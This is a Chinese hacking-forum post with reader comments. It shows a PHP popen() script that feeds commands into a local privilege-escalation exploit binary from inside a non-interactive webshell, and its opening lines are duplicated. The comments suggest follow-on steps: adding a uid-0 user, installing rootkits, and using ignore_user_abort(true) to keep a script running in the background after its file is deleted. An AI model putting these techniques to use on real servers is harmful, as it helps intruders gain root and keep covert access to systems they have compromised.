PHP 非交互式 执行交互式命令
提权转发不出来
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
再补一张图
只能出此下策
shell可以用except来执行交互命令
python 也有pexcept模块
perl也有except模块
但是默认不安装
咱们还是用牛逼的php吧
我就不解释了 看懂的人自然就懂了
代码
<?php
$sucommand = "/tmp/2.6.18-2011";
$fp = popen($sucommand ,"w");
@fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");
@pclose($fp);
?>再补一张图
关于作者
评论55次
长姿势了。
那这样子,不用反弹shell了? 联想一下,好大的威力。
@zczpc2000 装rootki什么的啊,收集资料 什么的,最简单的直接加个id=0的用户,要非交互修改配置某行什么的可以用sed命令~~具体可以百度看下~~
看起来很厉害的样子
简单实用 学xi了 再也不用拿着个pexpect.py 到处跑了
学xi了,我就喜欢猥琐流
ignore_user_abort(true) 够邪恶,还没用过
流弊~这思路流弊~
这个功能很强大。。。
原型: resource popen ( string $command , string $mode ) 说明: 能够和命令进行交互。之前介绍的方法只能简单地执行命令,却不能与命令交互。有时须向命令输入一些东西,如在增加xi统用户时,要调用su来把当前用户换到root用户,而su命令必须要在命令行上输入root的密码。这种情况下,用之前提到的方法显然是不行的。 popen( )函数打开一个进程管道来执行给定的命令,返回一个文件句柄,可以对它读和写。返回值和fopen()函数一样,返回一个文件指针。除非使用的是单一的模式打开(读or写),否则必须使用pclose()函数关闭。该指针可以被fgets(),fgetss(),fwrite()调用。出错时,返回FALSE。 <?php error_reporting(E_ALL); /* Add redirection so we can get stderr. */ $handle = popen('/path/to/executable 2>&1', 'r'); echo "'$handle'; " . gettype($handle) . "\n"; $read = fread($handle, 2096); echo $read; pclose($handle); ?> php 一般都开启安全模式 7大执行命令函数禁用 配置的很变态 嗯嗯 php 还有一个邪恶的函数ignore_user_abort(true); 允许驻留执行 执行完php文件以后就会后台执行 删掉原文件都也依然可以执行 重启服务端自然就没有了不过可以结合数据库 来重刷嘿嘿
popen这个函数?
大哥,能再详细一点点吗
竟然还有这个功能。
弱弱的问一句 直接访问php文件就可以执行了,看起来是这个意思?
牛逼,为什么不早出来两天。。。